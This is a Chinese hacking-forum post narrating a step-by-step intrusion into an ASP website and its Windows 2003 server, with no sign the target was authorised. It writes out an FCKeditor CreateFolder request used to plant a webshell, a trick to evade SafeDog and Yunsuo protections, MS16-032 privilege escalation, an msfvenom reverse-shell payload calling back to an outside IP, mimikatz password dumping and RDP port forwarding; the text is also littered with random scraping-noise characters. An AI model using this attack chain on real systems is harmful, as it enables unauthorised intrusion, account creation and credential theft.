找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2141|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" M% O/ M$ a x! q& `

# }4 ^. @1 C0 \; n7 U; d+ M& w4 \/ X# h8 X* ?. z2 m* `9 m9 i2 A* @6 W# q" B# `1 X( T* o1 r: o$ S4 U9 A& s% Q/ q; ?7 n8 _' d- a
, G3 \# { I1 o E. m1 V

: Y* z& @! o- V. r
4 G0 D) e7 |4 F: h3 ~6 R/ ` v& R一、 利用getwebshell
3 h4 `3 X4 i' n1 t
5 a/ T9 z7 F1 m3 y首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
) Y5 H8 l' m8 o8 x* J
* [5 l. `; Z! k# |0 H. J 222.png
/ k' Y; C( s; I: L# K1 y 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
E2 k$ F+ X" p1 R% a ?0 U$ u% _7 c. ?333.png
( [! k5 @4 W+ j, D& M: J! F9 b* ]4 n下面我们构造一个asp目录,如: 3 K! }+ k! _8 t) g1 k$ E

: Q) u6 j& U" ]

0 M) @5 n( p$ w: _- C http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ! R2 }/ ^. R) u

2 v! E) w3 C+ O

0 f# C1 C7 G- t1 u0 W0 v" `' N: @ 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
' n: ^* X F2 H9 H
5 B" m' T5 K3 q: Y% y0 j% C5 K' K/ w 一、 绕过安全狗云锁提权并且加账号
$ a( N0 g( H7 b& Q0 n$ P 444.png
) _8 y. G1 H( n3 L" R) c3 N; r 没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
- c+ F; v$ i$ _3 V6 q. j# q* m, z
: k$ F7 l' z' M* d" S如图:
$ i" I) ^6 S! \9 s( |5 O! Q 555.png
' H$ o& n2 y" K$ }然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
+ m6 o* C+ R/ ?2 J2 x: ~9 y
# b H3 N) `3 d! Y9 e一、 利用metasploit
6 [4 Q/ G* E& J1 N0 o
( U- V5 \ q# ]# d9 X首先用pentestbox生成一个64位的payload如下命令
1 K1 k" a3 W; O; }: d0 m
+ J" l2 K$ C% c& W3 ` msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
, b- g4 v6 ?8 J \
; s! A9 J% [4 U 为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
4 m( g0 U; A1 a" c& q 11.png
* N0 C* ^7 J% F' Y- y下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
6 g4 e z, \! f8 C: Y1 _: ? 13.png
9 x( \9 w/ F1 `4 v% h下面我们来做一个监听如下命令:
& ], n7 e' N2 B
- v% q4 d" J/ R/ M portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
# n% o: }0 e# K4 o6 _ 18.png & P+ W# c* X+ c# n3 n5 D; X7 z* F- ^

" A4 x. I$ o5 Q$ q g+ ]' \$ D
* j! J+ s7 Y6 Y

6 J- c! Y- x ]* i S/ `# m5 V" O

! Y5 x( y+ |$ D# @9 p
7 R, v( f' f, a/ ~8 I8 v4 O
7 Q- q: T- f( X" n + w+ |' R3 O* p! w1 U/ v7 S# c

! ^0 ?& e6 E2 N+ z! M/ t; ], z
2 f' u; ^& k5 _& U: E ) }4 u; ]$ w3 G2 I

0 I' s+ L* }! W$ D" i! q- U- _; L" E
2 w( j+ o" C8 _* C' K! G

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表